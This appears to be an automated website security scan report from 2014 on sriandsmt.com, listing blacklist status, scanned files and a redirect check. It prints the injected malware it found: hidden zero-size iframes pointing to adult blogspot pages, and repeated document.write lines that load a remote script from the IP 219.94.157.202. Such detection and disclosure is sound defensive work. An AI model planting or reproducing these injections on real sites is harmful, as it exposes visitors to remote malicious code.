Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sriandsmt.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://sriandsmt.com/ | 200 OK Content-Length: 10018 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://xxxporno-video.blogspot.com
<iframe name="byagresif" src="http://xxxporno-video.blogspot.com" width="0" height="0" scrolling="no" frameborder="0" marginwidth="0" marginheight="0">
Hidden iFrame found. size: 0x0 src: http://xxxvideo-izle.blogspot.com
<iframe name="byagresif" src="http://xxxvideo-izle.blogspot.com" width="0" height="0" scrolling="no" frameborder="0" marginwidth="0" marginheight="0">
http://sriandsmt.com/script/script.js | 200 OK Content-Length: 3071 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function invchdetect(str) { var tr=true; var s=str.length; if(s==0) { return true; } else { for(i=0;i<s;i++) { if(str.charCodeAt(i)<48||str.charCodeAt(i)>57&&str.charCodeAt(i)<65||str.charCodeAt(i)>90&&str.charCodeAt(i)<97||str.charCodeAt(i)>122) { tr=false; break; } } if(tr==false) {return false; } else {return tr
document.write('<script src=http://219.94.157.202/testtestesttest/newface.php ><\/script>');
document.write('<script src=http://219.94.157.202/testtestesttest/newface.php ><\/script>');
document.write('<script src=http://219.94.157.202/testtestesttest/newface.php ><\/script>');
document.write('<script src=http://219.94.157.202/testtestesttest/newface.php ><\/script>');
Antivirus reports:
http://sriandsmt.com/addprofile.php | 200 OK Content-Length: 65250 Content-Type: text/html | clean |
http://sriandsmt.com/../p_exporters.asp | 400 Bad Request Content-Length: 345 Content-Type: text/html | clean |
http://sriandsmt.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sun, 28 Dec 2014 00:20:07 GMT Location: http://www.fastwebhost.com/404error.htm Server: Apache Content-Length: 223 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.fastwebhost.com/404error.htm | 200 OK Content-Length: 1979 Content-Type: text/html | clean |
http://www.fastwebhost.com/ | 200 OK Content-Length: 16367 Content-Type: text/html | clean |
http://www.fastwebhost.com/js/jquery.min.js | 200 OK Content-Length: 85260 Content-Type: application/javascript | clean |
http://www.fastwebhost.com/js/slides.min.jquery.js | 200 OK Content-Length: 6784 Content-Type: application/javascript | clean |
http://www.fastwebhost.com/js/rollover.js | 200 OK Content-Length: 1064 Content-Type: application/javascript | clean |
http://www.fastwebhost.com/js/chrome.js | 200 OK Content-Length: 6395 Content-Type: application/javascript | clean |
http://www.fastwebhost.com/unlimited-web-hosting.html | 200 OK Content-Length: 32325 Content-Type: text/html | clean |
http://www.fastwebhost.com/windows-web-hosting.html | 200 OK Content-Length: 31898 Content-Type: text/html | clean |
http://www.fastwebhost.com/reseller-hosting.html | 200 OK Content-Length: 23644 Content-Type: text/html | clean |
http://www.fastwebhost.com/windows-reseller.html | 200 OK Content-Length: 25676 Content-Type: text/html | clean |
https://www.fastwebhost.com/clients/pwreset.php | 200 OK Content-Length: 11331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sriandsmt.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Connection: close
Date: Sun, 28 Dec 2014 00:20:05 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=2fa077542e95ccfaf6393e3690a03b80; path=/
X-Powered-By: PHP/5.3.27
Second query (visit from search engine):
GET / HTTP/1.1
Host: sriandsmt.com
Referer: http://www.google.com/search?q=sriandsmt.com
Result:
The result is similar to the first query. There are no suspicious redirects found.